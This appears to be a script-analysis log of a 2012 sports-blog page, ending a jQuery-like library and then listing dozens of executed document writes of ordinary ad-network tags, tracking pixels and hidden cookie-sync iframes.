            }) : this[0] == window || this[0] == document ? self[i ? 'pageYOffset' : 'pageXOffset'] || D.boxModel && document.documentElement[c] || document.body[c] : this[0][c]
        }
    });
    D.each(["Height", "Width"], function(i, b) {
        var c = i ? "Left" : "Top",
            br = i ? "Right" : "Bottom";
        D.fn["inner" + b] = function() {
            return this[b.toLowerCase()]() + num(this, "padding" + c) + num(this, "padding" + br)
        };
        D.fn["outer" + b] = function(a) {
            return this["inner" + b]() + num(this, "border" + c + "Width") + num(this, "border" + br + "Width") + (a ? num(this, "margin" + c) + num(this, "margin" + br) : 0)
        }
    })
})();

Executed Writes (111)

#1 JavaScript::Write (size: 0, repeated: 2)

#2 JavaScript::Write (size: 113, repeated: 1)

<!-- PubMatic ad tag (Javascript) : yardbarker_300x250_ROS | http://www.yardbarker.com | 300 x 250 Sidekick -->

#3 JavaScript::Write (size: 95, repeated: 2)

<script type="text/javascript" src="http://ads.pubmatic.com/AdServer/js/showad.js">
 </script>

#4 JavaScript::Write (size: 312, repeated: 1)

(function () { var d = new Image(1, 1);	d.onerror = d.onload = function () { d.onerror = d.onload = null; }; d.src = ['//secure-us.imrworldwide.com/cgi-bin/m?ci=us-603545h&cg=0&cc=1&si=', escape(window.location.href), '&rp=', escape(document.referrer), '&ts=compact&rnd=', (new Date()).getTime()].join(''); })();

#5 JavaScript::Write (size: 194, repeated: 1)

<!-- BEGIN JS TAG - YardBarker Site List A - INT 728 < - DO NOT MODIFY -->
<SCRIPT SRC="http://ads.cpxinteractive.com/ttj?id=937121&size=728x90" TYPE="text/javascript"></SCRIPT>
<!-- END TAG -->

#6 JavaScript::Write (size: 27, repeated: 1)

<!-- Begin comScore tag -->

#7 JavaScript::Write (size: 26, repeated: 1)

<!-- End Quantcast tag -->

#8 JavaScript::Write (size: 25, repeated: 1)

<!-- End comScore tag -->

#9 JavaScript::Write (size: 32, repeated: 2)

<!-- PubMatic Ad Ends --></span>

#10 JavaScript::Write (size: 113, repeated: 1)

<!-- PubMatic ad tag (Javascript) : yardbarker_728x90_ROS | http://www.yardbarker.com | 728 x 90 Leaderboard -->

#11 JavaScript::Write (size: 28, repeated: 1)

<!-- Start Quantcast tag -->

#12 JavaScript::Write (size: 1498, repeated: 1)

<!doctype html><html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);}</script><script>vu("http://adx.g.doubleclick.net/pagead/adview?ai\x3dCzhxH4bKpUM6YEeKa6gGQwIGoBsn9_ssCoYaizzGhq_TujwEQASAAUIDH4cQEYMP0oYWQGIIBF2NhLXB1Yi03Mjc5NDEwMDQ4MDI0MjQ4yAEJqAMBqgRmT9CchwIRi1rCsoV_Qc6ZRIXIq1KY4HNUJrpVn-4GmGEqKxxRe_sfgLGAr1z44lE4iDa5fuucsUJrySdMeke-nyMjbjFOkmDMBhuqRlndXOvBXEoruVGI_PYirq6OKeDlLoliaIBl\x26sigh\x3dQdmt8lUFCRU")</script><div style="text-align: center;">
<script type="text/javascript"><!--
adroll_width = 160;
adroll_height = 600;
adroll_a_id = "U6PZANHGRBHQFBIDRUUZ3E";
adroll_s_id = "N34ZPOW5TRGMJKDEFHM2G4";
adroll_c_id = "BQDGKMYTZBBJNGPJAOOVU7";
adroll_render_link = false;
adroll_ext_network = "g";
adroll_c_macro = "http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCzhxH4bKpUM6YEeKa6gGQwIGoBsn9_ssCoYaizzGhq_TujwEQASAAUIDH4cQEYMP0oYWQGIIBF2NhLXB1Yi03Mjc5NDEwMDQ4MDI0MjQ4yAEJqAMBqgRmT9CchwIRi1rCsoV_Qc6ZRIXIq1KY4HNUJrpVn-4GmGEqKxxRe_sfgLGAr1z44lE4iDa5fuucsUJrySdMeke-nyMjbjFOkmDMBhuqRlndXOvBXEoruVGI_PYirq6OKeDlLoliaIBl%26num%3D1%26sig%3DAOD64_1a8TX0rlnFxVW5psBTIGYBwIu5bA%26client%3Dca-pub-7279410048024248%26adurl%3D";
adroll_url_macro = "fenwaywest.com";
adroll_cpm_macro = "UKmy4QAETE4KOo1iZQBgEB04waUCfEeJNuCoQw";
//--></script>
<script type="text/javascript" src="http://a.adroll.com/j/rolling.js"></script>
</div></body></html>

#13 JavaScript::Write (size: 11, repeated: 4)

</noscript>

#14 JavaScript::Write (size: 9, repeated: 3)

</script>

#15 JavaScript::Write (size: 1301, repeated: 1)

<IFRAME HEIGHT="250" WIDTH="300" SRC="http://akamai-media.contextweb.com/creatives/BackupTags/520266/bdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html" VISIBLE="true" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME><div style="display:none;width:0;height:0"><script>var _comscore = _comscore || [];_comscore.push({ c1: "8", c2: "2102", c3: "120", c4: "", c5: "", c15: "", c16: "" });(function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s, el);})();</script><noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=2102&c3=120&c4=&c5=&c6=&c15=&c16=&cv=2.0&cj=1" /></noscript></div><div style="display:none;width:0;height:0"><IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.TECHNOLOGYCOMPUTING.GRAPHICS.WEBDESIGNHTML,PUBLISHER.520266,,CAMPAIGN..0,,ADSIZE.300X250" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME></div><div style="display:none"><iframe src="http://bh.contextweb.com/bh/visitormatch?tag=66901&pid=520266"></iframe></div>

#16 JavaScript::Write (size: 1275, repeated: 1)

<IFRAME HEIGHT="600" WIDTH="160" SRC="http://akamai-media.contextweb.com/creatives/BackupTags/520266/00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html" VISIBLE="true" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME><div style="display:none;width:0;height:0"><script>var _comscore = _comscore || [];_comscore.push({ c1: "8", c2: "2102", c3: "0", c4: "", c5: "", c15: "", c16: "" });(function() {var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";el.parentNode.insertBefore(s, el);})();</script><noscript><img src="http://b.scorecardresearch.com/p?c1=8&c2=2102&c3=0&c4=&c5=&c6=&c15=&c16=&cv=2.0&cj=1" /></noscript></div><div style="display:none;width:0;height:0"><IFRAME SRC="http://pixel.quantserve.com/pixel/p-01-0VIaSjnOLg.gif?tags=CONTEXTWEB.UNCONTEXTUALIZED,PUBLISHER.520266,,CAMPAIGN..0,,ADSIZE.160X600" HEIGHT="0" WIDTH="0" MARGINWIDTH="0" MARGINHEIGHT="0" ALLOWTRANSPARENCY="true" FRAMEBORDER="0" SCROLLING="NO"></IFRAME></div><div style="display:none"><iframe src="http://bh.contextweb.com/bh/visitormatch?tag=66902&pid=520266"></iframe></div>

#17 JavaScript::Write (size: 1640, repeated: 1)

<IFRAME SRC="http://ad.doubleclick.net/adi/N3814.290927.AFFIPERF.COM19/B7153410.2;sz=728x90;ord=1709586981709445095;click=http://pixel.mathtag.com/click/img?mt_aid=1709586981709445095&mt_id=239527&mt_adid=100412&mt_uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592&redirect=" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'><SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N3814.290927.AFFIPERF.COM19/B7153410.2;sz=728x90;ord=1709586981709445095;click=http://pixel.mathtag.com/click/img?mt_aid=1709586981709445095&mt_id=239527&mt_adid=100412&mt_uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592&redirect="></SCRIPT><NOSCRIPT><A HREF="http://pixel.mathtag.com/click/img?mt_aid=1709586981709445095&mt_id=239527&mt_adid=100412&mt_uuid=50a9b2e2-9d68-d676-6901-3c5fafca2592&redirect=http://ad.doubleclick.net/jump/N3814.290927.AFFIPERF.COM19/B7153410.2;sz=728x90;ord=1709586981709445095?"><IMG SRC="http://ad.doubleclick.net/ad/N3814.290927.AFFIPERF.COM19/B7153410.2;sz=728x90;ord=1709586981709445095?" BORDER=0 WIDTH=728 HEIGHT=90 ALT="Advertisement"></A></NOSCRIPT></IFRAME><div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://cm.g.doubleclick.net/pixel?google_nid=mediamath&google_cm&google_hm=NTBhOWIyZTItOWQ2OC1kNjc2LTY5MDEtM2M1ZmFmY2EyNTky' height='1' width='1'></div><div width='1' height='1' style='display:none; overflow:hidden'><img style='left:-10px;top:-10px; position:absolute' src='http://tags.bluekai.com/site/4448?id=50a9b2e2-9d68-d676-6901-3c5fafca2592' height='1' width='1'></div>

#18 JavaScript::Write (size: 403, repeated: 1)

<IFRAME SRC='http://r1.ace.advertising.com/site=782467/size=300250/u=2/bnum=82574062/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252Fbdb502a4-5d70-42c0-a7d9-604184e4e18eLijit_Box..html' WIDTH=300 HEIGHT=250 SCROLLING=NO FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0></IFRAME>

#19 JavaScript::Write (size: 407, repeated: 1)

<IFRAME SRC='http://r1.ace.advertising.com/site=782471/size=160600/u=2/bnum=70770769/wkhr=29/hr=5/hl=1/scres=5/swh=1176x885/tile=1/f=2/r=1/optn=1/fv=10/aolexp=0/tags=1/dref=http%253A%252F%252Fakamai-media.contextweb.com%252Fcreatives%252FBackupTags%252F520266%252F00259a8d-0f3c-4e40-8e92-68482cb19d04Lijit_Scraper..html' WIDTH=160 HEIGHT=600 SCROLLING=NO FRAMEBORDER=0 MARGINHEIGHT=0 MARGINWIDTH=0></IFRAME>

#20 JavaScript::Write (size: 207, repeated: 2)

<a href="//twitter.com/share" class="twitter-share-button"  data-via="FenwayWest"   data-url="http://www.fenwaywest.com/sh404sef-custom-content/404.html" data-text="__404__" data-count="horizontal">Tweet</a>

#21 JavaScript::Write (size: 809, repeated: 1)

<a href="http://d.adroll.com/r/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/d578c155d932b53ac071e99e234c6043.re?adroll_height=600&amp;adroll_width=160&amp;site_url=http%3A//fenwaywest.com&amp;cpm=UKmy4QAETE4KOo1iZQBgEB04waUCfEeJNuCoQw&amp;adroll_network=g&amp;clickurl=http://adclick.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DCzhxH4bKpUM6YEeKa6gGQwIGoBsn9_ssCoYaizzGhq_TujwEQASAAUIDH4cQEYMP0oYWQGIIBF2NhLXB1Yi03Mjc5NDEwMDQ4MDI0MjQ4yAEJqAMBqgRmT9CchwIRi1rCsoV_Qc6ZRIXIq1KY4HNUJrpVn-4GmGEqKxxRe_sfgLGAr1z44lE4iDa5fuucsUJrySdMeke-nyMjbjFOkmDMBhuqRlndXOvBXEoruVGI_PYirq6OKeDlLoliaIBl%26num%3D1%26sig%3DAOD64_1a8TX0rlnFxVW5psBTIGYBwIu5bA%26client%3Dca-pub-7279410048024248%26adurl%3D" target="_blank"><img src="http://a.adroll.com/a/XER/C7S/XERC7SMQKFB2FO6VTX75I5.jpg" alt="" border="0" height="600" width="160"></a>

#22 JavaScript::Write (size: 1355, repeated: 1)

<a href="http://ib.adnxs.com/click?AAAAAAAA8D8AAAAAAADwPwAAAAAAAPA_AAAAAAAA8D8AAAAAAADwP1yZhAFjr-RJoArzhH1cTlHnsqlQAAAAAHwJDgAYAQAAQgYAAAIAAAAoxjwAqZECAAAAAQBVU0QAVVNEACwB-gDaJQAA0kkAAgUCAQUAAIQA2Rg5rQAAAAA./cnd=%21iAUlMgjUuC0QqIzzARipowogAA../referrer=http%3A%2F%2Fad.yieldmanager.com%2Fiframe3%3FdxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnl-sqZpfyDOwpO0Qmtn.Ij9GlQg6LUP-tDMVRAAAAAA%3D%3D%2C%2Chttp%253A%252F%252Ffenwaywest.com%252Fmedia%252Findex.php%2CZ%253D300x250%2526_salt%253D698192661%2526anmember%253D514%2526anprice%253D80%2526r%253D0%2526s%253D1651067%2C10146920-3200-11e2-9fc0-1cc1def0ff7e%2C1353298662569/clickenc=http%3A%2F%2Fnetwork.realmedia.com%2FRealMedia%2Fads%2Fclick_lx.ads%2Fbloguin%2Fros%2F300x250%2Fsx%2Fss%2Fa%2FL7%2F276422772%2Fx15%2FUSNetwork%2FMAX_US_GeneralInterest_Tier03_300x250_MAX_Campaign%2Fmax_tag.html%2F77352b4d335643707375634141746d30%3Fhttp%253A%252F%252Fwww.reverbnation.com%252Fanx_ads%252Fthehagueband_anx_744532_3982888%252Fredir" target="_blank"><img width="300" height="250" style="border-style: none" src="http://cdn.adnxs.com/p/b3/70/6b/64/b3706b64e2cd0d8c89492e0d7889b257.jpg"/></a>

#23 JavaScript::Write (size: 608, repeated: 1)

<a href="http://ib.adnxs.com/click?AAAAAAAA8D8zMzMzMzPrPwAAAAAAAPA_MzMzMzMz6z8AAAAAAADwP-CJ3Gi8cuBwoArzhH1cTlHhsqlQAAAAAKFMDgAdAgAANQEAAAIAAAAGIDEAEzABAAAAAQBVU0QAVVNEANgCWgD5LwAA3E4AAgUCAQUAAAAA8RoJ8gAAAAA./cnd=%21kAUGMgjf1wcQhsDEARiT4AQgAA../referrer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php/clickenc=http%3A%2F%2Fwww.sitecore.net%2FLanding%2FGlobal%2FQ3_2012%2FGL_WP_BR2_GartnerMQ_WCM_2012_online%3Fsc_camp%3DA256A2F107274D67B5E0E54C6D4A16A2" target="_blank"><img width="728" height="90" style="border-style: none" src="http://cdn.adnxs.com/p/cb/23/22/a4/cb2322a48bc54909477900bd9385df48.jpg"/></a>

#24 JavaScript::Write (size: 1096, repeated: 1)

<div class="adroll-block">
    


    
        
        <script type="text/javascript">
        (function () {
            var _t = document.createElement('span');
            var a = document.createElement('a');
            a.target = "_blank";
            var _href = __adroll.format_macros("http://d.adroll.com/r/N34ZPOW5TRGMJKDEFHM2G4/U6PZANHGRBHQFBIDRUUZ3E/d578c155d932b53ac071e99e234c6043.re", true, true, false);
            a.href = _href;

            
            a.innerHTML = '<img src="http://a.adroll.com/a/XER/C7S/XERC7SMQKFB2FO6VTX75I5.jpg" width="160" height="600" border="0" alt="" />';
            _t.appendChild(a);
            document.write(_t.innerHTML);
            __adroll.reset();
        })();
        </script>

<script>(function() {document.write('<sc'+'ript type="text/javascript" src="' + (("https:" == document.location.protocol) ? "https://a248.e.akamai.net/betterad.download.akamai.com/91609" : "http://c.betrad.com") + '/surly.js?;ad_w=160;ad_h=600;ecaid=BQDGKMYTZBBJNGPJAOOVU7_XERC7SMQKFB2FO6VTX75I5_g;coid=412;nid=890;"></scr'+'ipt>');}());</script>
</div>

#25 JavaScript::Write (size: 55, repeated: 1)

<div id="cw_td_430165" style="height:0;width:0;"></div>

#26 JavaScript::Write (size: 56, repeated: 1)

<div id="cw_td_4676329" style="height:0;width:0;"></div>

#27 JavaScript::Write (size: 56, repeated: 1)

<div id="cw_td_6757458" style="height:0;width:0;"></div>

#28 JavaScript::Write (size: 979, repeated: 1)

<div id="k_adsbeacon" style='display:none;float:left;margin:0px;height:0px;width:0px;' kadheight='250' kadwidth='300' rec='http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597' pid='28596' ></div><script type="text/javascript" src="http://showads.pubmatic.com/AdServer/AdServerServlet?pubId=28596&siteId=28597&adId=24363&kadheight=250&kadwidth=300&inIframe=1&operId=3&kbgColor=498A72&ktextColor=191919&klinkColor=A60B1D&kltstamp=2012-11-19 5:17:38&timezone=1&screenResolution=1176x885&adPosition=-1x-1&frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597&prevkadIds=24361&pmUniAdId=top_0_1&ranreq=0.07518536242931384&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&refurl=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php" ></script><div id="k_adsbeacon" style='display:none;float:left;margin:0px;height:0px;width:0px;' kadheight='250' kadwidth='300' rec='http_fenwaywest_commediaindex_php_komli_ads_frame_1_28596_28597' pid='28596' ></div>

#29 JavaScript::Write (size: 958, repeated: 1)

<div id="k_adsbeacon" style='display:none;float:left;margin:0px;height:0px;width:0px;' kadheight='90' kadwidth='728' rec='http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597' pid='28596' ></div><script type="text/javascript" src="http://showads.pubmatic.com/AdServer/AdServerServlet?pubId=28596&siteId=28597&adId=24361&kadheight=90&kadwidth=728&inIframe=1&operId=3&kbgColor=498A72&ktextColor=191919&klinkColor=A60B1D&kltstamp=2012-11-19 5:17:36&timezone=1&screenResolution=1176x885&adPosition=-1x-1&frameName=http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597&pmUniAdId=top_0_0&ranreq=0.5295620945665518&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&refurl=http%3A%2F%2Fwww.88websitedesign.com%2Findex.php" ></script><div id="k_adsbeacon" style='display:none;float:left;margin:0px;height:0px;width:0px;' kadheight='90' kadwidth='728' rec='http_fenwaywest_commediaindex_php_komli_ads_frame_0_28596_28597' pid='28596' ></div>

#30 JavaScript::Write (size: 25, repeated: 1)

<div id="uat10808"></div>

#31 JavaScript::Write (size: 24, repeated: 1)

<div id="uat6584"></div>

#32 JavaScript::Write (size: 243, repeated: 1)

<div id='PubMaitc_AdTags_Loading_top_0_0' style='height:0;width:0;padding:0;margin:0;display:none;'> <a id='PubMaitc_AdTags_Loading_Anchor_top_0_0' style='height:0;width:0;padding:0;margin:0;display:none;' href='javascript:void(0);'></a></div>

#33 JavaScript::Write (size: 243, repeated: 1)

<div id='PubMaitc_AdTags_Loading_top_0_1' style='height:0;width:0;padding:0;margin:0;display:none;'> <a id='PubMaitc_AdTags_Loading_Anchor_top_0_1' style='height:0;width:0;padding:0;margin:0;display:none;' href='javascript:void(0);'></a></div>

#34 JavaScript::Write (size: 486, repeated: 1)

<div id='beacon_1549' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap3iad3.lijit.com/www/delivery/lg.php?bannerid=1549&amp;campaignid=232&amp;cids=232&amp;bids=1549&amp;zoneid=95029&amp;tid=95029_1353298662292da37f36c0459&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=198e1eed62' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>

#35 JavaScript::Write (size: 486, repeated: 1)

<div id='beacon_1550' style='position: absolute; left: 0px; top: 0px; visibility: hidden;'><img src='http://vap3iad3.lijit.com/www/delivery/lg.php?bannerid=1550&amp;campaignid=232&amp;cids=232&amp;bids=1550&amp;zoneid=95032&amp;tid=95032_1353298658273e3751f284eda&amp;channel_ids=,&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;referer=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;cb=d93a230863' width='0' height='0' alt='' style='width: 0px; height: 0px;' /></div>

#36 JavaScript::Write (size: 33, repeated: 1)

<div id=dclkAdsDivID_13482></div>

#37 JavaScript::Write (size: 139, repeated: 1)

<div><img src='//secure-us.imrworldwide.com/cgi-bin/m?ci=us-603545h&amp;cg=0&amp;cc=1&amp;ts=noscript' width='1' height='1' alt='' /></div>

#38 JavaScript::Write (size: 195, repeated: 2)

<fb:like href="http://www.fenwaywest.com/sh404sef-custom-content/404.html" layout="button_count" show_faces="false" send="false" width="" action="like" font="arial" colorscheme="light"></fb:like>

#39 JavaScript::Write (size: 752, repeated: 1)

<iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="250" width="300" src="http://ad.yieldmanager.com/iframe3?bV5bEg73CQAQ7oEAAAAAAPL-IAAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAAmGQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB0nl0zZ5fyDJK-L4dTr-5Wz7Lp7cDnX.5.rk.vAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2Fbdb502a4-5d70-42c0-a7d9-604184e4e18elijit_box..html,Z%3D300x250%26_salt%3D115542970%26anmember%3D514%26anprice%3D100%26r%3D0%26s%3D653070,106c775a-3200-11e2-909d-b32498808ef9,1353298663146"></iframe>

#40 JavaScript::Write (size: 671, repeated: 1)

<iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="250" width="300" src="http://ad.yieldmanager.com/iframe3?dxpuAHsxGQB3lnwAAAAAAG7KHwAAAAAAAgAAAAIAAAAAAP8AAAACBnhSEwAAAAAA29spAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAC8ixAAAAAAAAIAAgAAgD8AmpmZmZmZ2T-amZmZmZnZP5qZmZmZmdk.mpmZmZmZ2T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABnl-sqZpfyDOwpO0Qmtn.Ij9GlQg6LUP-tDMVRAAAAAA==,,http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php,Z%3D300x250%26_salt%3D698192661%26anmember%3D514%26anprice%3D80%26r%3D0%26s%3D1651067,10146920-3200-11e2-9fc0-1cc1def0ff7e,1353298662569"></iframe>

#41 JavaScript::Write (size: 761, repeated: 1)

<iframe allowtransparency="true" scrolling="no" marginwidth="0" marginheight="0" frameborder="0" height="600" width="160" src="http://ad.yieldmanager.com/iframe3?bV5bEg73CQDE7YEAAAAAAO.-IAAAAAAAAgAAAAoAAAAAAP8AAAACBnhSEwAAAAAAlWQrAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACBFgUAAAAAAAIAAgAAgD8AmpmZmZmZ4T-amZmZmZnhP5qZmZmZmeE.mpmZmZmZ4T8AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADnxEqrZZfyDOO0V2t1xdAjbOQCb-ysJXB92.sNAAAAAA==,,http%3A%2F%2Fakamai-media.contextweb.com%2Fcreatives%2Fbackuptags%2F520266%2F00259a8d-0f3c-4e40-8e92-68482cb19d04lijit_scraper..html,B%3D1%26Z%3D160x600%26_salt%3D1488817%26anmember%3D514%26anprice%3D40%26r%3D0%26s%3D653070,0fabe2ec-3200-11e2-9d8b-3c4a92f73a52,1353298661884"></iframe>

#42 JavaScript::Write (size: 254, repeated: 1)

<iframe frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/freq.html"></iframe>

#43 JavaScript::Write (size: 360, repeated: 1)

<iframe id="pmInfoFrm_top_0_0" name="pmAdInfoFrm" frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/adTagInfo.html" onload="PubMatic.pmAdInfo.infoFrameLoaded(this,'top_0_0')"></iframe>

#44 JavaScript::Write (size: 360, repeated: 1)

<iframe id="pmInfoFrm_top_0_1" name="pmAdInfoFrm" frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/adTagInfo.html" onload="PubMatic.pmAdInfo.infoFrameLoaded(this,'top_0_1')"></iframe>

#45 JavaScript::Write (size: 299, repeated: 1)

<iframe name="dpsynciframe" frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/dppix.html?p=28596&s=28597&a=24361"></iframe>

#46 JavaScript::Write (size: 591, repeated: 1)

<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no"  width="0"  height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=28596&siteId=28597&adId=24361&adServerId=1425&kefact=0.050000&kaxefact=0.050000&kadNetFrequecy=1&kadwidth=728&kadheight=90&kadsizeid=7&kltstamp=1353298656&indirectAdId=0&adServerOptimizerId=2&ranreq=0.5295620945665518&kpbmtpfact=0.000000&imprCap=1&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php"> </iframe>

#47 JavaScript::Write (size: 662, repeated: 1)

<iframe name="pbeacon" frameborder="0" allowtransparency="true" hspace="0" vspace="0" marginheight="0" marginwidth="0" scrolling="no"  width="0"  height="0" style="position:absolute;top:-20000px;" src="http://track.pubmatic.com/AdServer/AdDisplayTrackerServlet?operId=1&pubId=28596&siteId=28597&adId=24363&adServerId=243&kefact=0.400000&kaxefact=0.400000&kadNetFrequecy=1&kadwidth=300&kadheight=250&kadsizeid=9&kltstamp=1353298658&indirectAdId=0&adServerOptimizerId=2&ranreq=0.07518536242931384&kpbmtpfact=0.437691&carrierid=-1&campaignId=1336&creativeId=0&pctr=0.000000&wDSPByrId=230&imprCap=1&pageURL=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php"> </iframe>

#48 JavaScript::Write (size: 296, repeated: 1)

<iframe name="synciframe" frameborder="0" allowtransparency="true" marginheight="0" marginwidth="0" scrolling="no" width="0" hspace="0" vspace="0" height="0" style="position:absolute;top:-15000px;left:-15000px" src="http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=28596&s=28597"></iframe>

#49 JavaScript::Write (size: 338, repeated: 1)

<iframe name='pframe0' width='0' height='0' frameborder='0' marginwidth='0' marginheight='0' vspace='0' hspace='0' allowtransparency='true' scrolling='no' src=' http://pixel.invitemedia.com/pubmatic_sync?pubmatic_callback=http://image2.pubmatic.com/AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM5MCZ0bD0xMjk2MDA=
&piggybackCookie= '></iframe>

#50 JavaScript::Write (size: 391, repeated: 1)

<iframe src="http://gslbeacon.lijit.com/beacon?viewId=1353298658700ebc440fd1c19&amp;rand=1353298658700&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php" style="border: 0pt none; width: 1px; height: 1px; display: none;"></iframe>

#51 JavaScript::Write (size: 391, repeated: 1)

<iframe src="http://gslbeacon.lijit.com/beacon?viewId=1353298662674c203f9f9ae4d&amp;rand=1353298662674&amp;uri=http://www.lijit.com/users/bloguin/1&amp;informer=6280786&amp;type=fpads&amp;loc=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php&amp;ifr=1&amp;v=1.0&amp;rr=http%3A%2F%2Ffenwaywest.com%2Fmedia%2Findex.php" style="border: 0pt none; width: 1px; height: 1px; display: none;"></iframe>

#52 JavaScript::Write (size: 198, repeated: 1)

<iframe src="http://view.atdmt.com/iaction/adoapn_AppNexusDemoActionTag_1" width="1" height="1" frameborder="0" scrolling="No" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0"></iframe>

#53 JavaScript::Write (size: 1361, repeated: 1)

